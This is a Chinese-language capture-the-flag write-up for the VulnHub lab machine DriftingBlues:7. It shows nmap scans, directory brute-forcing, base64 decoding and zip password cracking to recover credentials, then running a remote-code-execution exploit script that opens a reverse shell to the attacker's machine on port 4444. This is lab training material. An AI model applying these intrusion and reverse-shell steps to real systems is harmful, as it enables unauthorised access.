vulnhub靶机 | DriftingBlues:7 write-up

靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/

 

题目的目标是要夺到里面的flag,搭建好环境如图。

 

vulnhub靶机 | DriftingBlues:7 write-up_第1张图片

 

首先用nmap扫描一下ip地址

  •  
nmap -sP 192.168.110.1/24  #扫描网段中存活主机

vulnhub靶机 | DriftingBlues:7 write-up_第2张图片

  •  
nmap -p- 192.168.110.167  #在看看上面运行的服务

vulnhub靶机 | DriftingBlues:7 write-up_第3张图片

  •  
nmap -sV 192.168.110.167  #查看服务版本

vulnhub靶机 | DriftingBlues:7 write-up_第4张图片

上面运行的一些apache、ssh所在版本都没有漏洞,所以我们从它的80端口入手。访问80端口会被跳转到如下页面

vulnhub靶机 | DriftingBlues:7 write-up_第5张图片

这里尝试了弱口令,暴力破解都没有猜解到密码,所以我们可以先去扫描一下它的目录结构。

vulnhub靶机 | DriftingBlues:7 write-up_第6张图片

扫描出来的目录也没有发现什么有价值的东西。所以只能从其他的端口进行切入了。上面扫描ip上运行的端口发现上面还有一些其他的端口,其中有一个66端口。

vulnhub靶机 | DriftingBlues:7 write-up_第7张图片

上面运行了一个SimpleHttpServer 0.6,所以我们进行访问。

vulnhub靶机 | DriftingBlues:7 write-up_第8张图片

接下来再去扫描一下它的目录结构

vulnhub靶机 | DriftingBlues:7 write-up_第9张图片

扫描出一个index_files文件夹,进行访问

vulnhub靶机 | DriftingBlues:7 write-up_第10张图片

但是里面并没有发现什么有价值的东西,然后就卡了好久,但是感觉就有一种的洞就在这里的感觉。后来打开kali用dirsearch去爆破了下目录。

  •  
python3 dirsearch.py -u http://192.168.110.167:66 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

 

 

vulnhub靶机 | DriftingBlues:7 write-up_第11张图片

发现有了另外的收获,吓得我赶快去访问试一试。

vulnhub靶机 | DriftingBlues:7 write-up_第12张图片

下载了一个是文件下来,打开看看。

vulnhub靶机 | DriftingBlues:7 write-up_第13张图片

有点相base64编码后的字符串,那我们用base64解码试一试。

vulnhub靶机 | DriftingBlues:7 write-up_第14张图片

PK开头,熟悉压缩包的师傅都懂了吧,这应该是一个压缩包文件了。那我们把解码后的字符串复制出来写进一个zip文件里面去,但是发现写不进去。

vulnhub靶机 | DriftingBlues:7 write-up_第15张图片

那我们在kali上打开进行base64解码然后输出

  •  
cat eon | base64 -d>eon.zip

 

vulnhub靶机 | DriftingBlues:7 write-up_第16张图片

然后解压发现需要密码

  

vulnhub靶机 | DriftingBlues:7 write-up_第17张图片

要密码那只好爆破了

vulnhub靶机 | DriftingBlues:7 write-up_第18张图片

然后打开creds.txt文件可以看到账号密码

vulnhub靶机 | DriftingBlues:7 write-up_第19张图片

那我们回到80端口进行登陆

vulnhub靶机 | DriftingBlues:7 write-up_第20张图片

登陆成功

vulnhub靶机 | DriftingBlues:7 write-up_第21张图片

vulnhub靶机 | DriftingBlues:7 write-up_第22张图片

在上图可以看到版本,接下来我们搜索该版本存在什么漏洞。

vulnhub靶机 | DriftingBlues:7 write-up_第23张图片

有个远程代码执行漏洞,把下方exp保存到kali

vulnhub靶机 | DriftingBlues:7 write-up_第24张图片

现在kali上监听4444端口

vulnhub靶机 | DriftingBlues:7 write-up_第25张图片

然后运行脚本

  •  
python3 1.py https://192.168.110.167/ -ip 192.168.110.164 -port 4444

 

vulnhub靶机 | DriftingBlues:7 write-up_第26张图片

接收到shell,然后就是寻找flag的位置了。然后发现在root目录下

vulnhub靶机 | DriftingBlues:7 write-up_第27张图片

vulnhub靶机 | DriftingBlues:7 write-up_第28张图片

你可能感兴趣的:(vulnhub专栏,CTF,渗透测试,网络安全)